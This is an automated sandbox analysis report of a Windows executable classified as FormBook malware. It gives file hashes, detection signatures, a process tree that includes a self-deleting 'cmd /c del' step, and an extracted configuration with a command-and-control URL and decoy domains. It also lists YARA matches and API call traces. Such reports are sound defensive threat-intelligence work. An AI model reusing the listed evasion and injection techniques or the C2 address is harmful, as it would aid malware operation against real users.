Windows Analysis Report Fp4grWelSC.exe

Overview

General Information

Sample Name: Fp4grWelSC.exe
Analysis ID: 552852
MD5: 0e99d13aafcc5e8fadc45d8b85336d9b
SHA1: 6573c9dd229e50981aa24128ad02a07e99805369
SHA256: a15402c5f869a1c02421742c27dd71c2448bb037d391a6bf130be06b2f976e2f
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Fp4grWelSC.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\Fp4grWelSC.exe" MD5: 0E99D13AAFCC5E8FADC45D8B85336D9B)
    • Fp4grWelSC.exe (PID: 6436 cmdline: C:\Users\user\Desktop\Fp4grWelSC.exe MD5: 0E99D13AAFCC5E8FADC45D8B85336D9B)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6860 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • cmd.exe (PID: 7036 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 7080 cmdline: /c del "C:\Users\user\Desktop\Fp4grWelSC.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 5396 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • explorer.exe (PID: 3460 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.safetyeats.asia/pnug/"], "decoy": ["natureate.com", "ita-pots.website", "sucohansmushroom.com", "produrielrosen.com", "gosystemupdatenow.online", "jiskra.art", "janwiench.com", "norfolkfoodhall.com", "iloveaddictss.com", "pogozip.com", "buyinstapva.com", "teardirectionfreedom.xyz", "0205168.com", "apaixonadosporpugs.online", "jawscoinc.com", "crafter.quest", "wikipedianow.com", "radiopuls.net", "kendama-co.com", "goodstudycanada.com", "huzhoucs.com", "asinment.com", "fuchsundrudolph.com", "arthurenathalia.com", "globalcosmeticsstudios.com", "brandrackley.com", "freemanhub.one", "utserver.online", "fullspecter.com", "wshowcase.com", "airjordanshoes-retro.com", "linguimatics.com", "app-verlengen.icu", "singpost.red", "j4.claims", "inoteapp.net", "jrdautomotivellc.com", "xn--beaupre-6xa.com", "mypolicyportal.net", "wdgjdhpg.com", "anshulindla.com", "m981070.com", "vertentebike.com", "claim-available.com", "buyfudgybombs.com", "adfnapoli.com", "blackfuid.com", "clambakedelivered.info", "marketingworksonhold.com", "xvyj.top", "richardsonsfinest.com", "gurimix.com", "dorhop.com", "mauigrowngreencoffee.net", "juzytuu.xyz", "pokorny.industries", "floridapermitsolutions.com", "right-on-target-store.com", "ynaire.com", "nextpar.com", "disdrone.com", "fruitfulvinebirth.com", "africanfairytale.com", "leisuresabah.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      4.2.Fp4grWelSC.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      4.2.Fp4grWelSC.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      4.2.Fp4grWelSC.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      4.0.Fp4grWelSC.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      4.0.Fp4grWelSC.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: Fp4grWelSC.exe, Virustotal: Detection: 30%
          Source: Fp4grWelSC.exe, ReversingLabs: Detection: 39%
          Yara detected FormBook
          Antivirus detection for URL or domain
          Source: www.safetyeats.asia/pnug/, Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: Fp4grWelSC.exe, Joe Sandbox ML: detected
          Source: 4.0.Fp4grWelSC.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.Fp4grWelSC.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.Fp4grWelSC.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.Fp4grWelSC.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: Fp4grWelSC.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Fp4grWelSC.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Fp4grWelSC.exe, 00000004.00000002.764180454.00000000014F0000.00000040.00000001.sdmp, Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942277980.0000000003230000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942585836.000000000334F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Fp4grWelSC.exe, 00000004.00000002.766071483.00000000035D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000000.763461139.00000000011D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Fp4grWelSC.exe, 00000004.00000002.764180454.00000000014F0000.00000040.00000001.sdmp, Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942277980.0000000003230000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942585836.000000000334F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdb source: Fp4grWelSC.exe, 00000004.00000002.766071483.00000000035D0000.00000040.00020000.sdmp, cmd.exe, cmd.exe, 0000000B.00000000.763461139.00000000011D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 11_2_011F31DC FindFirstFileW,FindNextFileW,FindClose,11_2_011F31DC
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 11_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_011D85EA
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 11_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,11_2_011E245C
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 11_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,11_2_011DB89C
          Source: C:\Windows\SysWOW64\cmd.exe, Code function: 11_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,11_2_011E68BA

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.safetyeats.asia/pnug/

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Fp4grWelSC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,11_2_011E374E
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_004185E0 NtCreateFile,4_2_004185E0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00418690 NtReadFile,4_2_00418690
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00418710 NtClose,4_2_00418710
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_004187C0 NtAllocateVirtualMemory,4_2_004187C0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041868A NtReadFile,4_2_0041868A
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041870A NtClose,4_2_0041870A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_011F6D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011FB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_011FB5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_011DB42E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_011D84BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,11_2_011D58A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DB4C0 NtQueryInformationToken,11_2_011DB4C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DB4F8 NtQueryInformationToken,NtQueryInformationToken,11_2_011DB4F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,11_2_011D83F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F9AB4 NtSetInformationFile,11_2_011F9AB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,11_2_011E6550
          Source: Fp4grWelSC.exe, 00000000.00000002.688004733.00000000003DF000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainManag.exe8 vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000000.00000002.693045785.0000000006D10000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000000.685619670.0000000000B1F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainManag.exe8 vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000002.766242265.000000000361D000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000003.762703815.0000000001147000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000002.764785736.000000000179F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Fp4grWelSC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Fp4grWelSC.exeVirustotal: Detection: 30%
          Source: Fp4grWelSC.exeReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Fp4grWelSC.exe "C:\Users\user\Desktop\Fp4grWelSC.exe"
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess created: C:\Users\user\Desktop\Fp4grWelSC.exe C:\Users\user\Desktop\Fp4grWelSC.exe
